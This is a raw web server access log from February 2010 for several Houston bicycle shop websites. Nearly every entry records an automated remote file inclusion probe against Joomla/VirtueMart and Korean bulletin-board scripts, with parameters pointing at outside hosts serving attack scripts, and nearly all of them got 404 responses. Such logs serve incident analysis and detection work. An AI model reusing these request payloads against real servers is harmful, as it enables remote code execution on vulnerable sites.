213.251.189.201 - - [11/Feb/2010:04:10:22 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.251.189.201 - - [11/Feb/2010:04:10:22 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.251.189.201 - - [11/Feb/2010:04:10:22 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.251.189.201 - - [11/Feb/2010:04:11:36 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.251.189.201 - - [11/Feb/2010:04:11:36 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.251.189.201 - - [11/Feb/2010:04:11:36 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
24.23.78.174 - - [11/Feb/2010:04:11:36 -0800] "GET /logs/access.log//bbs//skin/moengallery/ask_password.php?dir=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "houstonbikeshop.com"
24.23.78.174 - - [11/Feb/2010:04:11:36 -0800] "GET /bbs//skin/moengallery/ask_password.php?dir=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "houstonbikeshop.com"
24.23.78.174 - - [11/Feb/2010:04:11:37 -0800] "GET /logs//bbs//skin/moengallery/ask_password.php?dir=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "houstonbikeshop.com"
210.205.6.233 - - [11/Feb/2010:04:12:56 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [11/Feb/2010:04:12:56 -0800] "GET /translations/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [11/Feb/2010:04:12:56 -0800] "GET /translations/English-US.txt%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.251.189.201 - - [11/Feb/2010:04:14:02 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.251.189.201 - - [11/Feb/2010:04:14:02 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.251.189.201 - - [11/Feb/2010:04:14:02 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.24 - - [11/Feb/2010:04:14:17 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.24 - - [11/Feb/2010:04:14:17 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.24 - - [11/Feb/2010:04:14:18 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.172.236.41 - - [11/Feb/2010:04:17:01 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.172.236.41 - - [11/Feb/2010:04:17:01 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.172.236.41 - - [11/Feb/2010:04:17:01 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
221.139.0.75 - - [11/Feb/2010:04:17:59 -0800] "GET /logs/access.log%20%20/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
221.139.0.75 - - [11/Feb/2010:04:17:59 -0800] "GET /write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
221.139.0.75 - - [11/Feb/2010:04:17:59 -0800] "GET /logs/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.24 - - [11/Feb/2010:04:18:26 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.24 - - [11/Feb/2010:04:18:26 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.251.189.201 - - [11/Feb/2010:04:18:28 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.251.189.201 - - [11/Feb/2010:04:18:28 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.251.189.201 - - [11/Feb/2010:04:18:28 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [11/Feb/2010:04:18:29 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [11/Feb/2010:04:18:29 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [11/Feb/2010:04:18:29 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.24 - - [11/Feb/2010:04:18:30 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.172.236.41 - - [11/Feb/2010:04:18:35 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.172.236.41 - - [11/Feb/2010:04:18:35 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.172.236.41 - - [11/Feb/2010:04:18:35 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
221.139.0.75 - - [11/Feb/2010:04:19:15 -0800] "GET /write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
221.139.0.75 - - [11/Feb/2010:04:19:15 -0800] "GET /logs/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
221.139.0.75 - - [11/Feb/2010:04:19:15 -0800] "GET /logs/access.log%20%20/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [11/Feb/2010:04:20:47 -0800] "GET /translations/Polish.txt/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [11/Feb/2010:04:20:47 -0800] "GET /translations/Polish.txt/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [11/Feb/2010:04:20:53 -0800] "GET /translations/Portuguese.txt/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [11/Feb/2010:04:20:58 -0800] "GET /translations/Portuguese.txt/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.93.149.176 - - [11/Feb/2010:04:21:57 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.93.149.176 - - [11/Feb/2010:04:21:57 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.93.149.176 - - [11/Feb/2010:04:21:57 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [11/Feb/2010:04:22:34 -0800] "GET /translations/Polish.txt/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [11/Feb/2010:04:22:57 -0800] "GET /translations/Portuguese.txt/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.93.149.176 - - [11/Feb/2010:04:22:59 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.93.149.176 - - [11/Feb/2010:04:22:59 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.93.149.176 - - [11/Feb/2010:04:22:59 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [11/Feb/2010:04:25:13 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [11/Feb/2010:04:25:36 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [11/Feb/2010:04:27:25 -0800] "GET /translations/Polish.txt/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [11/Feb/2010:04:27:35 -0800] "GET /translations/Portuguese.txt/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
221.139.0.75 - - [11/Feb/2010:04:29:31 -0800] "GET /logs/access.log%20%20/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
221.139.0.75 - - [11/Feb/2010:04:29:31 -0800] "GET /logs/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
221.139.0.75 - - [11/Feb/2010:04:29:31 -0800] "GET /write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [11/Feb/2010:04:31:50 -0800] "GET /skin/zero_vote/error.php?dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [11/Feb/2010:04:31:50 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [11/Feb/2010:04:31:50 -0800] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [11/Feb/2010:04:31:52 -0800] "GET /skin/zero_vote/error.php?dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [11/Feb/2010:04:31:52 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [11/Feb/2010:04:31:52 -0800] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.90.47.134 - - [11/Feb/2010:04:34:55 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://jireh.or.kr/images/pastor_index_.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.90.47.134 - - [11/Feb/2010:04:34:55 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://jireh.or.kr/images/pastor_index_.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.90.47.134 - - [11/Feb/2010:04:34:55 -0800] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://jireh.or.kr/images/pastor_index_.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
97.77.218.174 - - [11/Feb/2010:04:38:47 -0800] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "www.svbikes.com"
97.77.218.174 - - [11/Feb/2010:04:38:48 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "www.svbikes.com"
97.77.218.174 - - [11/Feb/2010:04:38:53 -0800] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "www.svbikes.com"
97.77.218.174 - - [11/Feb/2010:04:38:53 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "www.svbikes.com"
85.13.139.254 - - [11/Feb/2010:04:41:57 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [11/Feb/2010:04:41:57 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [11/Feb/2010:04:41:57 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [11/Feb/2010:04:43:45 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [11/Feb/2010:04:43:45 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [11/Feb/2010:04:43:45 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [11/Feb/2010:04:44:04 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [11/Feb/2010:04:44:04 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [11/Feb/2010:04:44:04 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [11/Feb/2010:04:44:27 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [11/Feb/2010:04:44:27 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [11/Feb/2010:04:44:27 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [11/Feb/2010:04:44:58 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
85.13.139.254 - - [11/Feb/2010:04:44:58 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
85.13.139.254 - - [11/Feb/2010:04:44:58 -0800] "GET /logs/scripts.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
85.13.139.254 - - [11/Feb/2010:04:47:57 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
85.13.139.254 - - [11/Feb/2010:04:47:57 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
85.13.139.254 - - [11/Feb/2010:04:47:57 -0800] "GET /logs/scripts.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
58.150.99.131 - - [11/Feb/2010:04:55:05 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://qqe.ru/forum/bj.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
85.13.139.254 - - [11/Feb/2010:04:55:07 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [11/Feb/2010:04:55:07 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [11/Feb/2010:04:55:07 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.251.189.201 - - [11/Feb/2010:04:56:07 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
213.251.189.201 - - [11/Feb/2010:04:56:07 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
213.251.189.201 - - [11/Feb/2010:04:56:07 -0800] "GET /logs/scripts.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
75.125.143.154 - - [11/Feb/2010:04:56:12 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.125.143.154 - - [11/Feb/2010:04:56:12 -0800] "GET /logs/access.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.125.143.154 - - [11/Feb/2010:04:56:15 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.115.111 - - [11/Feb/2010:04:56:40 -0800] "GET /logs/?D=A HTTP/1.0" 200 2352 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
85.13.139.254 - - [11/Feb/2010:04:59:12 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [11/Feb/2010:04:59:12 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [11/Feb/2010:04:59:12 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [11/Feb/2010:05:00:12 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
85.13.139.254 - - [11/Feb/2010:05:00:12 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
85.13.139.254 - - [11/Feb/2010:05:00:12 -0800] "GET /logs/scripts.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
